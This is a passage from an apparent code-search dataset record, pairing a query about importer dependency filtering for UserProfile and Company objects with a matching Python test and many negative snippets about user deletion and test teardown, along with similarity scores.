self.base.metadata.create_all(self.engine)\n people = self.provision_users()\n p = {'id': people[2].id}\n self.delete('user', 403, params=p)", "def test_employe_import(self):\n self.creer_employe()\n cmd = EmployeCommand()\n cmd.stdout = StringIO()\n cmd.handle('import')\n users = User.objects.all()\n self.assertEqual(len(users), 1)\n self.assertEqual(users[0].username, LOGGED_USER_USERNAME,)\n self.assertEqual(users[0].email, LOGGED_USER_EMAIL,)\n self.assertEqual(users[0].first_name, LOGGED_USER_SN,)\n self.assertEqual(users[0].last_name, LOGGED_USER_GN,)", "def test_delete_device_user(self):\n pass", "def tearDown(self) -> None:\n user = storage.get(User, self.user_id)\n if user is not None:\n storage.delete(user)\n city = storage.get(City, self.city_id)\n if city is not None:\n storage.delete(city)\n state = storage.get(State, self.state_id)\n if state is not None:\n storage.delete(state)\n storage.save()", "def tearDown(self) -> None:\n user = storage.get(User, self.user_id)\n if user is not None:\n storage.delete(user)\n city = storage.get(City, self.city_id)\n if city is not None:\n storage.delete(city)\n state = storage.get(State, self.state_id)\n if state is not None:\n storage.delete(state)\n storage.save()", "def test_delete_o_auth_client(self):\n pass", "def delete(self, obj):\n raise NotImplementedError", "def delete_item(self, id: str, user: User) -> bool:", "def test_delete_user(self):\n\n # Delete a user on an empty set\n deleted = self.user_api.delete_user(MAGEN_USER['user_uuid'])\n self.assertTrue(deleted.success) # idempotent request\n\n # Inserting user into Database\n 
inserted = self.user_api.insert_user(MAGEN_USER)\n self.assertTrue(inserted.success)\n\n # Inserting a client for this user into Database\n inserted = self.client_api.insert_client(MAGEN_CLIENT)\n self.assertTrue(inserted.success)\n\n # Delete user\n deleted = self.user_api.delete_user(MAGEN_USER['user_uuid'])\n self.assertTrue(deleted.success)\n # Verify that user was actually removed\n self.assertIsNone(self.user_api.get_user(MAGEN_USER['user_uuid']).documents)\n # Verify that client was removed with the user\n self.assertIsNone(self.client_api.get_client(MAGEN_CLIENT['mc_id']).documents)", "def test_delete(self):\n self.request.access.allow_delete = [\"everyone\"]\n pkg = make_package(factory=DynamoPackage)\n self._save_pkgs(pkg)\n self.db.delete(pkg)\n count = self.engine.scan(DynamoPackage).count()\n self.assertEqual(count, 0)\n count = self.engine.scan(PackageSummary).count()\n self.assertEqual(count, 0)\n self.storage.delete.assert_called_with(pkg)", "def before_delete(self, obj, st):\n pass", "def tearDown(self):\n self.auth_manager.delete_project('proj1')\n self.auth_manager.delete_project('proj2')\n self.auth_manager.delete_user('user1')\n self.auth_manager.delete_user('user2')\n self.auth_manager.delete_user('admin_user')\n super(ObjectStoreTestCase, self).tearDown()", "def post_delete_access_attempt(self, instance, **kwargs):", "def _delete(self, pk, user=None):\n request = self.factory.delete(self.detail_url(pk), format='json')\n force_authenticate(request, user)\n resp = self.detail_view(request, pk=pk)\n resp.render()\n return resp", "def test_dupe_imports(self):\r\n good_file = self._get_del_file()\r\n imp = Importer(good_file, username=u\"admin\")\r\n imp.process()\r\n\r\n good_file = self._get_del_file()\r\n imp = Importer(good_file, username=u\"admin\")\r\n imp.process()\r\n\r\n # now let's do some db sanity checks\r\n self._delicious_data_test()", "def test_deleting_a_persisted_entity(self, test_domain):\n identifier = uuid4()\n person = test_domain.repository_for(Person)._dao.create(\n id=identifier, first_name=\"Jim\", last_name=\"Carrey\"\n )\n deleted_person = test_domain.repository_for(Person)._dao.delete(person)\n assert deleted_person is not None\n assert deleted_person.state_.is_destroyed is True\n\n with pytest.raises(ObjectNotFoundError):\n test_domain.repository_for(Person)._dao.get(identifier)", "def test_delete_profile(mocker, user):\n patched_delete_task = mocker.patch(\"search.search_index_helpers.deindex_document\")\n deindex_profile(user)\n assert patched_delete_task.called is True\n assert patched_delete_task.call_args[0] == (\n gen_profile_id(user.username),\n PROFILE_TYPE,\n )", "def delete_by(self, user):\n if user.is_superuser or user is self.added_by:\n self.delete()", "def tearDown(self):\n user = SpokeUser(self.org_name)\n user.delete(self.first, self.last)\n org = SpokeOrg()\n org.delete(self.org_name)", "def test_admin_delete_user_taskrun(self):\r\n\r\n with self.flask_app.test_request_context('/'):\r\n user_taskrun = TaskRunFactory.create()\r\n\r\n assert self.mock_admin.id != user_taskrun.user.id\r\n assert_not_raises(Exception,\r\n getattr(require, 'taskrun').delete,\r\n user_taskrun)", "def delete_user(self):\n raise NotImplementedError(\"Function not yet implemented contact package creator\")", "def test_delete(self):\n pass", "def test_delete_data(self):\n data = Data.objects.create(\n name='Test data',\n contributor=self.user,\n process=self.proc,\n )\n\n data.output = {'json_field': {'foo': 'bar'}}\n data.status = Data.STATUS_DONE\n 
data.save()\n\n self.assertEqual(Storage.objects.count(), 1)\n\n data.delete()\n self.assertEqual(Storage.objects.count(), 0)", "def test_factory_gives_delicious(self):\r\n loc = os.path.dirname(__file__)\r\n del_file = os.path.join(loc, 'delicious.html')\r\n\r\n with open(del_file) as del_io:\r\n imp = Importer(del_io, username=u\"admin\")\r\n\r\n self.assertTrue(\r\n isinstance(imp, DelImporter),\r\n \"Instance should be a delimporter instance\")", "def test_delete_cascade(self):\n\n self.assertEquals(\n Employee.objects.get(cpf=\"974.220.200-16\"),\n self.employee\n )\n\n self.user.delete()\n\n with self.assertRaises(Employee.DoesNotExist):\n Employee.objects.get(cpf=\"974.220.200-16\")", "def setUp(self):\n\n User.query.delete()", "def test_delete_no_username(self):\n\n self.portal.portal_properties.site_properties.use_email_as_login = True\n\n # This should fail either an username or user object should be given\n self.assertRaises(ValueError, api.user.delete)\n self.assertRaises(ValueError, api.user.delete,\n username='[email protected]', user=mock.Mock())\n\n api.user.create(email='[email protected]', password='secret')\n api.user.delete(username='[email protected]')\n\n user = api.user.create(email='[email protected]', password='secret')\n api.user.delete(user=user)", "def delete_user():\n #TODO user delete\n pass", "def test_delete(client):\n rv = delete(client, 'Michael')\n assert json.loads(rv.data.decode())['code'] == 0\n assert json.loads(rv.data.decode())['owner'] == 'Michael'", "def test_none_admin_delete(self):\n\n with self.client:\n token = self.customer()\n id = 1\n response = self.client.delete('api/v1/meals/{}'.format(id),\n headers=({\"token\": token}))\n data = json.loads(response.data.decode())\n self.assertEqual(data.get('message'),\n \"Customer is not authorized to access this page\")\n self.assertEqual(response.status_code, 401)", "def tearDown(self):\n Author.objects.all().delete()\n User.objects.all().delete()\n c.credentials()", "def test_groups_group_users_user_delete(self):\n pass", "def test_groups_group_users_user_delete(self):\n pass" ]
[ "0.6992192", "0.6501583", "0.63623047", "0.60247934", "0.5967793", "0.594195", "0.57997954", "0.57775795", "0.56826866", "0.56701046", "0.56604755", "0.5646488", "0.5642088", "0.5631375", "0.5626657", "0.55903274", "0.55903274", "0.5548128", "0.5526234", "0.5525164", "0.5518593", "0.5480383", "0.543759", "0.5418156", "0.5410556", "0.54056954", "0.53951174", "0.5382639", "0.5368453", "0.53489447", "0.53489447", "0.53395593", "0.53376395", "0.53363174", "0.53342974", "0.53177756", "0.53163344", "0.53150976", "0.5303231", "0.5300517", "0.5277335", "0.5259433", "0.52510804", "0.5249687", "0.5238578", "0.52383006", "0.5237136", "0.5232436", "0.5222647", "0.52123356", "0.51973385", "0.51964134", "0.51864654", "0.5183507", "0.5169601", "0.51695174", "0.5167181", "0.51669943", "0.51662135", "0.5160411", "0.5153488", "0.5146139", "0.51427037", "0.5141046", "0.5139996", "0.51286566", "0.5128542", "0.51279074", "0.5127647", "0.51239836", "0.51081574", "0.51081574", "0.50965285", "0.50962585", "0.50960207", "0.50944", "0.50936186", "0.5089757", "0.5088526", "0.5085417", "0.5084085", "0.5079246", "0.50779796", "0.5063574", "0.505849", "0.50541073", "0.5053974", "0.5052906", "0.5043338", "0.5033263", "0.5031729", "0.50298953", "0.50269496", "0.5024519", "0.50176185", "0.5016865", "0.5012964", "0.50073534", "0.50048596", "0.50048596" ]
0.6286618
3
Ensures any object with an analogous dependency relationship to UserProfile > User && UserProfile > Company can filter based on its related import kvs
def test_dependent_object_import(self):
    # Initialize Importers
    up_manager = ImporterManager(importer=UserProfileImporter())
    company_manger = ImporterManager(importer=CompanyImporter())
    user_manager = ImporterManager(importer=UserImporter())

    # Populate leaf models of dependency tree with kv data
    for row,name in enumerate(self.usernames):
        user_manager.update_kvs(field_name='username', value=name, row=row)
        company_manger.update_kvs(field_name='natural_id', value=self.company.natural_id, row=row)

    #: Retrieve data associated with kv data
    user_manager.get_available_rows()
    company_manger.get_available_rows()

    #: Populate data up the dependency tree with retrieved rows
    for row in range(self.n_objs):
        up_manager.update_kvs('company', company_manger.get_object_or_list(row), row=row)
        up_manager.update_kvs('user', user_manager.get_object_or_list(row), row=row)

    #: Retrieve data associated with models depended upon
    up_manager.get_available_rows()

    #: Test corresponding UserProfile has been returned
    for row in range(self.n_objs):
        objs = up_manager.get_objs_and_meta(row)  #: Returns a list of objects only if manytomany, o/w just 1
        self.assertEqual(objs[0].available, True)
        self.assertIsNotNone(objs[0].object)
        self.assertIsInstance(objs[0].object, UserProfile)
        self.assertIsNotNone(objs[0].query)
        self.assertEqual(objs[0].object.user.username, self.usernames[row])
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_twice_dependent_object_import(self):\n pass", "def test_partial_twice_dependent_object_import(self):\n pass", "def test_m2m_dependent_object_import_precision(self): #: TODO: Come up with a better name\n other_company = Company.objects.create(name='Other Co', natural_id='oc')\n _,other_user_profile = create_base_models(username='other', company=other_company)\n\n #: Create same named tags <-- assert later that they do not get filtered out as they are from a different\n #: company\n blue = Tag.objects.create(\n company=other_company,\n created_by=other_user_profile,\n name='blue',\n slug='blue',\n rank=0\n )\n green = Tag.objects.create(\n company=other_company,\n created_by=other_user_profile,\n name='green',\n slug='green',\n rank=2\n )\n\n user_profile: UserProfile = self.user_profiles[0] # See self.setUp()\n\n # ************ First Handle generating the Tags/Images Synthetically Through the Importer ************\n # Initialize Importers\n image_manager = ImporterManager(importer=ImageImporter())\n tag_manager = ImporterManager(importer=TagImporter())\n up_manager = ImporterManager(importer=UserProfileImporter())\n company_manger = ImporterManager(importer=CompanyImporter())\n user_manager = ImporterManager(importer=UserImporter())\n\n # Populate leaf models of dependency tree with kv data\n for row,image in enumerate(self.images):\n user_manager.update_kvs(field_name='username', value=user_profile.user.username, row=row)\n company_manger.update_kvs(field_name='natural_id', value=self.company.natural_id, row=row)\n\n #: Retrieve data associated with kv data\n user_manager.get_available_rows()\n company_manger.get_available_rows()\n\n #: Populate data up the dependency tree with retrieved rows\n for row,image in enumerate(self.images):\n up_manager.update_kvs('company', company_manger.get_object_or_list(row), row=row)\n up_manager.update_kvs('user', user_manager.get_object_or_list(row), row=row)\n\n #: Retrieve data associated with models depended upon\n up_manager.get_available_rows()\n\n tag_manager.update_kvs('slug', 'blue', row=0, col=0)\n tag_manager.update_kvs('slug', 'green', row=0, col=1)\n #: Anyway to avoid pushing these redundant kvs accross a row (??)\n tag_manager.update_kvs('company', company_manger.get_object_or_list(0), row=0, col=0)\n # tag_manager.update_kvs('company', company_manger.get_object_or_list(0), row=0, col=1)\n tag_manager.update_kvs('created_by', up_manager.get_object_or_list(0), row=0, col=0)\n # tag_manager.update_kvs('created_by', up_manager.get_object_or_list(0), row=0, col=1)\n\n tag_manager.update_kvs('slug', 'yellow', row=1, col=0)\n tag_manager.update_kvs('company', company_manger.get_object_or_list(1), row=1, col=0)\n tag_manager.update_kvs('created_by', up_manager.get_object_or_list(1), row=1, col=0)\n\n #: Retrieve associate intermediate data\n tag_manager.get_available_rows()\n\n self.assertEqual(len(tag_manager.get_object_or_list(0)), 2)\n for tag in tag_manager.get_object_or_list(0):\n self.assertEqual(tag.company_id, self.company.id)\n self.assertNotEqual(tag.company_id, other_company.id)\n\n self.assertIsInstance(tag_manager.get_object_or_list(1), Tag)", "def test_nondependent_object_get(self):\n manager = ImporterManager(importer=UserImporter())\n for row,name in enumerate(self.usernames):\n manager.update_kvs(field_name='username',value=name,row=row)\n\n manager.get_available_rows()\n for i in range(self.n_objs):\n objs: List[RecordData] = manager.get_objs_and_meta(i) #: Returns a list of objects only if manytomany\n 
self.assertEqual(objs[0].available, True)\n self.assertIsNotNone(objs[0].object)\n self.assertIsInstance(objs[0].object, User)\n self.assertIsNotNone(objs[0].query)\n\n del manager", "def test_m2m_dependent_object_import(self):\n user_profile: UserProfile = self.user_profiles[0] # See self.setUp()\n\n # ************ First Handle generating the Tags/Images Synthetically Through the Importer ************\n # Initialize Importers\n image_manager = ImporterManager(importer=ImageImporter())\n tag_manager = ImporterManager(importer=TagImporter())\n up_manager = ImporterManager(importer=UserProfileImporter())\n company_manger = ImporterManager(importer=CompanyImporter())\n user_manager = ImporterManager(importer=UserImporter())\n\n # Populate leaf models of dependency tree with kv data\n for row,image in enumerate(self.images):\n user_manager.update_kvs(field_name='username', value=user_profile.user.username, row=row)\n company_manger.update_kvs(field_name='natural_id', value=self.company.natural_id, row=row)\n\n #: Retrieve data associated with kv data\n user_manager.get_available_rows()\n company_manger.get_available_rows()\n\n #: Populate data up the dependency tree with retrieved rows\n for row,image in enumerate(self.images):\n up_manager.update_kvs('company', company_manger.get_object_or_list(row), row=row)\n up_manager.update_kvs('user', user_manager.get_object_or_list(row), row=row)\n\n #: Retrieve data associated with models depended upon\n up_manager.get_available_rows()\n\n tag_manager.update_kvs('slug', 'blue', row=0, col=0)\n tag_manager.update_kvs('slug', 'green', row=0, col=1)\n tag_manager.update_kvs('company', company_manger.get_object_or_list(0), row=0, col=0)\n tag_manager.update_kvs('created_by', up_manager.get_object_or_list(0), row=0, col=0)\n\n tag_manager.update_kvs('slug', 'yellow', row=1, col=0)\n tag_manager.update_kvs('company', company_manger.get_object_or_list(1), row=1, col=0)\n tag_manager.update_kvs('created_by', up_manager.get_object_or_list(1), row=1, col=0)\n\n #: Retrieve associate intermediate data\n tag_manager.get_available_rows()\n\n for row,image in enumerate(self.images):\n image_manager.update_kvs('path', image.path, row=row)\n image_manager.update_kvs('name', image.name, row=row)\n image_manager.update_kvs('tag', tag_manager.get_object_or_list(row), row=row)\n image_manager.update_kvs('company', company_manger.get_object_or_list(row), row=row)\n\n image_manager.get_available_rows()\n\n self.assertNotEqual(image_manager.get_object_or_list(0), [])\n self.assertIsInstance(image_manager.get_object_or_list(0), Image)\n\n self.assertNotEqual(image_manager.get_object_or_list(1), [])\n self.assertIsInstance(image_manager.get_object_or_list(1), Image)", "def test_partial_nondependent_object_get(self):\n MISSING_INDEX = 2\n User.objects.filter(username=self.usernames[MISSING_INDEX]).delete()\n\n manager = ImporterManager(importer=UserImporter())\n for row,name in enumerate(self.usernames):\n manager.update_kvs(field_name='username',value=name,row=row)\n\n manager.get_available_rows()\n for i in range(self.n_objs):\n objs: List[RecordData] = manager.get_objs_and_meta(i) #: Returns a list of objects only if manytomany\n if i==MISSING_INDEX:\n self.assertEqual(objs[0].available, False)\n self.assertIsNone(objs[0].object)\n self.assertIsNotNone(objs[0].query)\n continue\n\n self.assertEqual(objs[0].available, True)\n self.assertIsNotNone(objs[0].object)\n self.assertIsInstance(objs[0].object, User)\n self.assertIsNotNone(objs[0].query)\n\n del manager", "def 
related_view_filter():\n pass", "def test_list_dependent_assets2(self):\n pass", "def test_list_dependent_assets1(self):\n pass", "def test_list_dependent_assets(self):\n pass", "def test_list_dependent_assets3(self):\n pass", "def _check_cross_project_references(self, own_project_id,\r\n visibility_field):\r\n def check_project_id(subfilter):\r\n op = subfilter.keys()[0]\r\n if (op.lower() not in self.complex_operators\r\n and subfilter[op].keys()[0] == visibility_field\r\n and subfilter[op][visibility_field] != own_project_id):\r\n raise ProjectNotAuthorized(subfilter[op][visibility_field])\r\n\r\n self._traverse_postorder(self.filter_expr, check_project_id)", "def filter_installed(self, queryset, name, value):\n if str2bool(value):\n return queryset.exclude(belongs_to=None)\n else:\n return queryset.filter(belongs_to=None)", "def restrict_objects(self):\n if self.data_local and self.restrict_method_id:\n model = self.inventory_model.model\n global_vars = self.env['gdpr.restrict_method'].get_eval_context(restrict_days=self.restrict_time_days)\n if self.restrict_domain_advanced:\n eval(compile(self.restrict_domain_code, __name__, 'exec'), global_vars)\n domain = safe_eval(self.restrict_domain, global_vars)\n object_ids = [o['id'] for o in self.env[model].search_read(domain, ['id'])]\n _logger.debug('restrict_objects object_ids: %s' % object_ids)\n domain = [('restricted', '!=', True), ('gdpr_id', '=', self.id), ('object_res_id', 'in', object_ids)]\n if self.lawsection_id.consent:\n gdpr_o_ids = [o['gdpr_object_id'][0] for o in self.env['gdpr.consent'].search_read([('state', '=', 'withdrawn'), ('record_id', 'in', [('%s,%s' % (model, id)) for id in object_ids]), ('gdpr_id', '=', self.id)], ['gdpr_object_id'])]\n domain.append(('id', 'in', gdpr_o_ids))\n _logger.debug('restrict_objects domain: %s' % domain)\n objects = self.env['gdpr.object'].search(domain)\n if objects:\n self.restrict_method_id.restrict_objects(self, objects)", "def allow_relation(self, obj1, obj2, **hints):\n\n result = False\n if not (obj1._meta.model_name in GeoSpatialRouting.includedModels and \n obj2._meta.model_name in GeoSpatialRouting.includedModels) :\n result = None\n return result", "def test_get_models_filters(fc: fetcher.Fetcher, test_project_name, test_model):\n ml = fc.get_models(project=test_project_name)\n assert all(m.project_name == test_project_name for m in ml)\n\n ml = fc.get_models(model=test_model[\"name\"])\n assert all(m.name == test_model[\"name\"] for m in ml)\n\n ml = fc.get_models(project=test_project_name, model=test_model[\"name\"])\n assert all(\n m.project_name == test_project_name and m.name == test_model[\"name\"] for m in ml\n )", "def test_get_ancestors_requirements(self):\n pass", "def _check_criteria(dep, dep_obj, all_related, edge, sibling_idx):\n # Check for a matching dependency type\n related = []\n\n if edge[2][\"dep\"] == dep:\n # Check for matching POS type(s)\n for pos_logic in dep_obj.keys():\n connector = None\n\n if isinstance(dep_obj[pos_logic], dict):\n for pos in dep_obj[pos_logic].keys():\n\n # Check for allowed part of speech tags in matched dependency patterns\n if (pos_logic == \"pos_in\" and pos in G.nodes[sibling_idx][\"pos\"]) or (\n pos_logic == \"pos_equals\" and pos == G.nodes[sibling_idx][\"pos\"]):\n pass\n elif pos_logic == \"pos_not\":\n if not [False if not_pos == G.nodes[sibling_idx][\"pos\"] else True for not_pos in\n dep_obj.keys()]: continue\n else:\n continue\n\n # if no additional checks, have a match\n if dep_obj[pos_logic][pos] == None or any(\n y 
in dep_obj[pos_logic][pos] for y in [None, \"add_sibling\"]):\n all_related = _add_related(G.nodes[sibling_idx]['word'], dep, all_related,\n A.index_lookup[G.nodes[sibling_idx]['word']])\n\n # if additional checks are required, process further\n if dep_obj[pos_logic][pos]:\n if \"get_cousin\" in dep_obj[pos_logic][pos]:\n related.extend(_get_cousin(sibling_idx, dep_obj[pos_logic][pos][\"get_cousin\"]))\n connector = G.nodes[sibling_idx]['word']\n\n if \"special\" in dep_obj[pos_logic][pos]:\n if dep == \"compound\" and pos == \"NN\":\n related = [G.nodes[sibling_idx]['word']]\n\n if None in related:\n related.remove(None)\n\n # Allows for getting cousin and returning sibling\n if \"else\" in dep_obj[pos_logic][pos].keys() and dep_obj[pos_logic][pos][\"else\"] == \"always\":\n all_related = _add_related(G.nodes[sibling_idx]['word'], dep, all_related,\n A.index_lookup[G.nodes[sibling_idx]['word']], connector=connector)\n if len(related) > 0 and isinstance(related, list):\n for x in related:\n if x != None:\n all_related = _add_related(x, dep, all_related, A.index_lookup[x],\n connector=connector)\n elif \"else\" in dep_obj[pos_logic][pos].keys() and dep_obj[pos_logic][pos][\"else\"] == True:\n all_related = _add_related(G.nodes[sibling_idx]['word'], dep, all_related,\n A.index_lookup[G.nodes[sibling_idx]['word']], connector=connector)\n\n return all_related", "def test_get_used_models(fc: fetcher.Fetcher, test_model):\n used_models = fc.get_used_models()\n assert isinstance(used_models, dict)\n assert len(used_models) > 0\n assert all(type(model_name) == str for model_name in used_models.keys())\n assert all(type(query_count) == int for query_count in used_models.values())\n assert test_model[\"name\"] in used_models.keys()", "def queryset(self, request):\n qs = super(ChildAdmin, self).queryset(request)\n if request.user.is_superuser:\n \treturn qs\n if request.user.user_category == 'block':\n \treturn qs.filter(block=request.user.account.associated_with)\n if request.user.user_category == 'school':\n \treturn qs.filter(school=request.user.account.associated_with)\n if request.user.user_category == 'district':\n \treturn qs.filter(district=request.user.account.associated_with)\n # Register your models here.", "def test_coupledmodels_get(self):\n pass", "def set_restriction_filters(self):\n self.restriction_filters[\"pk__exact\"] = self.request.user.pk", "def compare_thresholded_data_with_models(self):\n pass", "def _check_excluded_propmodels(\n part_model: \"Part\", property_models: List[\"AnyProperty\"]\n) -> List[\"AnyProperty\"]:\n from pykechain.models import Part, Property\n\n if not part_model:\n # part model is unknown, only check for property_models\n return [check_base(pm, Property, \"property_model\") for pm in property_models]\n\n if not isinstance(part_model, Part):\n raise IllegalArgumentError(\n f'`part_model` must be a Part object, \"{part_model}\" is not.'\n )\n\n list_of_propmodels_excl: List[\"AnyProperty\"] = list()\n for property_model in property_models:\n if is_uuid(property_model):\n property_model = part_model.property(property_model)\n elif not isinstance(property_model, Property):\n raise IllegalArgumentError(\n \"A part reference property can only exclude `Property` models or their UUIDs, \"\n 'found type \"{}\"'.format(type(property_model))\n )\n\n if property_model.category != Category.MODEL:\n raise IllegalArgumentError(\n \"A part reference property can only exclude `Property` models, found \"\n 'category \"{}\" on property \"{}\"'.format(\n 
property_model.category, property_model.name\n )\n )\n elif part_model.id != property_model.part_id:\n raise IllegalArgumentError(\n \"A part reference property can only exclude properties belonging to the referenced\"\n ' Part model, found referenced Part model \"{}\" and Properties belonging to \"{}\"'.format(\n part_model.name, property_model.part.name\n )\n )\n else:\n list_of_propmodels_excl.append(property_model.id)\n return list_of_propmodels_excl", "def _fillSecurityInRelatedEntities(self, input_template):\n\n if not input_template.definition is None and \"columns\" in input_template.definition:\n for column in input_template.definition[\"columns\"]:\n if column[\"type\"] in [\"dropdown\", \"remoteDropdown\"]:\n related_input_template = InputTemplate.objects.get(code=column[\"entity\"])\n for related_column in related_input_template.definition[\"columns\"]:\n if related_column[\"type\"] == \"departmentSelector\":\n column[\"entityFilterByDepartment\"] = True\n break", "def test_list_filtering(self):\n # Test the \"all\" response.\n url = '/api/users/?all=true'\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, self.contract_user.email)\n self.assertContains(response, self.del_user.email)\n self.assertContains(response, self.shared.email)\n # Test filtering by ad_deleted.\n url = '/api/users/?ad_deleted=true'\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, self.del_user.email)\n self.assertNotContains(response, self.user1.email)\n url = '/api/users/?ad_deleted=false'\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n self.assertNotContains(response, self.del_user.email)\n self.assertContains(response, self.user1.email)\n # Test filtering by email (should return only one object).\n url = '/api/users/?email={}'.format(self.user1.email)\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n j = response.json()\n self.assertEqual(len(j['objects']), 1)\n self.assertContains(response, self.user1.email)\n self.assertNotContains(response, self.user2.email)\n # Test filtering by GUID (should return only one object).\n url = '/api/users/?ad_guid={}'.format(self.user1.ad_guid)\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n j = response.json()\n self.assertEqual(len(j['objects']), 1)\n self.assertContains(response, self.user1.email)\n self.assertNotContains(response, self.user2.email)\n # Test filtering by cost centre (should return all, inc. 
inactive and contractors).\n url = '/api/users/?cost_centre={}'.format(self.cc2.code)\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, self.user2.email)\n self.assertContains(response, self.contract_user.email)\n self.assertContains(response, self.del_user.email)\n self.assertNotContains(response, self.user1.email)\n self.assertNotContains(response, self.shared.email) # Belongs to CC1.\n # Test filtering by O365 licence status.\n self.user1.o365_licence = True\n self.user1.save()\n url = '/api/users/?o365_licence=true'\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, self.user1.email)\n self.assertNotContains(response, self.user2.email)", "def depends((a, b)):\r\n return (any(bout in a.inputs for bout in b.outputs)\r\n or any(depends((ainp.owner, b)) for ainp in a.inputs\r\n if ainp.owner))", "def test_model_can_import():\n assert hasattr(model, \"SEIR_model_publish_w_risk\")\n assert hasattr(model, \"compute_R0\")", "def assert_url_included_with_foreign_key(self, data, **kwargs):\n if \"user_id\" in data and \"user_url\" not in data:\n raise ValidationError(\"User ID was included, but User URL was not.\")\n if \"bike_id\" in data and \"bike_url\" not in data:\n raise ValidationError(\"Bike ID was included, but Bike URL was not.\")", "def assert_url_included_with_foreign_key(self, data, **kwargs):\n if \"user_id\" in data and \"user_url\" not in data:\n raise ValidationError(\"User ID was included, but User URL was not.\")\n if \"bike_id\" in data and \"bike_url\" not in data:\n raise ValidationError(\"Bike ID was included, but Bike URL was not.\")", "def check_access_rights(access_obj, thing):\n from apps.users.models import Dept, Subdept, Page\n if hasattr(thing, \"person\"): # Allow all user walls to be accessible by everyone\n return 1\n if isinstance(access_obj, User):\n erp_profile = access_obj.erp_profile\n erp_coords = erp_profile.coord_relations.all()\n erp_supercoords = erp_profile.supercoord_relations.all()\n erp_cores = erp_profile.core_relations.all()\n erp_pages = erp_profile.page_relations.all()\n \n # Have access to the thing directly\n id_query = Q(id=thing.id)\n my_query = ( \\\n Q(access_users__id__exact=access_obj.id) | \\\n Q(access_subdepts__in=erp_coords) | \\\n Q(access_depts__in=erp_supercoords) | \\\n Q(access_depts__in=erp_cores) | \\\n Q(access_pages__in=erp_pages)\n )\n if isinstance(thing, Post): \n # + Access to the wall of this post\n # + wall is directly related to me\n # + wall is related to all subdepts of my dept \n # + wall is related to all depts related to my subdepts\n my_query = my_query | \\\n Q(wall__access_users__id__exact=access_obj.id) | \\\n Q(wall__access_subdepts__in=erp_coords) | \\\n Q(wall__access_depts__in=erp_supercoords) | \\\n Q(wall__access_depts__in=erp_cores) | \\\n Q(wall__access_pages__in=erp_pages) | \\\n Q(wall__person=erp_profile) | \\\n Q(wall__subdept__in=erp_coords) | \\\n Q(wall__dept__in=erp_supercoords) | \\\n Q(wall__dept__in=erp_cores) | \\\n Q(wall__page__in=erp_pages) | \\\n Q(wall__subdept__dept__in=erp_supercoords) | \\\n Q(wall__subdept__dept__in=erp_cores) | \\\n Q(wall__dept__subdepts__in=erp_coords)\n my_query = my_query & id_query\n return Post.objects.filter(my_query).distinct().count()\n elif isinstance(thing, Wall):\n # + Directly related to the wall\n # + related to all subdepts of my dept \n # + related to all depts related to my subdepts\n my_query = my_query | \\\n 
Q(person=erp_profile) | \\\n Q(subdept__in=erp_coords) | \\\n Q(dept__in=erp_supercoords) | \\\n Q(dept__in=erp_cores) | \\\n Q(page__in=erp_pages) | \\\n Q(subdept__dept__in=erp_supercoords) | \\\n Q(subdept__dept__in=erp_cores) | \\\n Q(dept__subdepts__in=erp_coords)\n my_query = my_query & id_query\n return Wall.objects.filter(my_query).distinct().count()\n elif isinstance(access_obj, Subdept):\n return thing.access_subdepts.filter(id=access_obj.id).distinct().count()\n elif isinstance(access_obj, Dept):\n return thing.access_depts.filter(id=access_obj.id).distinct().count()\n elif isinstance(access_obj, Page):\n return thing.access_pages.filter(id=access_obj.id).distinct().count()", "def test_collect_classifier_dependencies_on_filter(self, module_repo):\n expected_result = {(\"CommonScripts\", True)}\n\n test_input = [\n {\n \"Dummy Classifier\": {\n \"name\": \"Dummy Classifier\",\n \"fromversion\": \"5.0.0\",\n \"pack\": \"dummy_pack\",\n \"filters\": [\"IsInCidrRanges\"],\n }\n }\n ]\n\n found_result = PackDependencies._collect_classifiers_dependencies(\n pack_classifiers=test_input,\n id_set=module_repo.id_set.read_json_as_dict(),\n )\n\n assert set(found_result) == set(expected_result)", "def filter_by_model(self, instance):\n content_type = ContentType.objects.get_for_model(instance.__class__)\n object_id = instance.id\n queryset = super(UserTrackerManager, self).filter(\n content_type=content_type, object_id=object_id)\n return queryset", "def _check_conditional_dependency(obj, condition, package, severity, msg=None):\n if condition:\n if msg is None:\n msg = (\n f\"The specific parameter values of {obj.__class__.__name__}'s \"\n f\"class instance require `{package}` installed. Please run: \"\n f\"`pip install {package}` to \"\n f\"install the `{package}` package. 
\"\n )\n try:\n _check_soft_dependencies(package, severity=severity, obj=obj)\n except ModuleNotFoundError as e:\n raise ModuleNotFoundError(msg) from e", "def _filter_denies(self, filtered_ref):\n for deny in self.denies_:\n if not deny:\n continue\n\n for ref_key in filtered_ref.ref_keys(deny):\n del filtered_ref[ref_key]", "def get_referents(data):\n fakes_group = data.groups.get(\"Fakes\")\n\n return [obj for obj in data.groups[\"Referents\"].objects\n if not obj.hide_render or fakes_group in obj.users_group]", "def get_queryset(self, request):\n qs = super().get_queryset(request)\n if request.user.is_superuser:\n return qs\n\n return qs.filter(inquiry__bank=request.user.profile.bank)", "def allow_relation(self, obj1, obj2, **hints):\n if obj1._meta.app_label == 'data_collection' or \\\n obj2._meta.app_label == 'data_collection':\n return True\n return None", "def test_all_field_dependencies_model(self, all_field_dependencies):\n # Loop over the dependencies\n for dependency in all_field_dependencies:\n api_keys = dependency.keys()\n # Check if the number of keys is the same between the model and the API\n assert len(self.model_keys) == len(api_keys)\n # Check of the keys and types of values are the same between the model and the API\n for key in self.model_keys:\n assert key in api_keys\n assert type(dependency[key]) in field_dep_model[key]", "def validate_dependencies(self, session, entry):", "def test_relatedonlyfieldlistfilter_foreignkey_ordering(self):\n\n class EmployeeAdminWithOrdering(ModelAdmin):\n ordering = (\"name\",)\n\n class BookAdmin(ModelAdmin):\n list_filter = ((\"employee\", RelatedOnlyFieldListFilter),)\n\n albert = Employee.objects.create(name=\"Albert Green\", department=self.dev)\n self.djangonaut_book.employee = albert\n self.djangonaut_book.save()\n self.bio_book.employee = self.jack\n self.bio_book.save()\n\n site.register(Employee, EmployeeAdminWithOrdering)\n self.addCleanup(lambda: site.unregister(Employee))\n 